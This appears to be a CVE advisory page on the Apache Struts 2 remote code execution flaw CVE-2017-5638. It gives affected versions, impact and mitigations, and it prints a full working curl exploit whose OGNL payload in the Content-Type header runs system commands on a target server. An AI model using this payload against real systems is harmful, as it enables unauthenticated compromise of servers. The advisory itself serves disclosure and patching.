Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)

By /

Listen to this Post

The CVE-2017-5638 vulnerability in Apache Struts 2 is a critical remote code execution flaw stemming from flawed error handling in the Jakarta Multipart parser. The exploit works by sending a maliciously crafted `Content-Type` HTTP header value to a server processing file uploads. If the header value is invalid, the parser attempts to generate an error message. However, it incorrectly interprets the header’s value using Object-Graph Navigation Language (OGNL) expressions. This allows an attacker to inject their own OGNL code directly into the `Content-Type` header. Since OGNL expressions can execute arbitrary system commands on the underlying server with the same privileges as the Struts application, the parser inadvertently evaluates and executes the attacker’s injected code. This bypasses all security controls, granting the attacker full control over the vulnerable system without requiring authentication.
Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10

Vulnerability : Remote Code Execution

Severity: Critical

date: March 2017

Prediction: Patch Available

What Undercode Say:

`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’id’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target.com/upload.action`

How Exploit:

Craft malicious Content-Type header.

Target Struts file upload endpoint.

OGNL expression evaluation.

Arbitrary command execution.

Protection from this CVE

Apply vendor patch.

Upgrade Struts version.

Use alternative parser.

Input validation filters.

Web Application Firewall.

Impact:

Complete system compromise.

Unauthenticated attack vector.

Data theft and manipulation.

Installation of persistent backdoors.

Service disruption.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top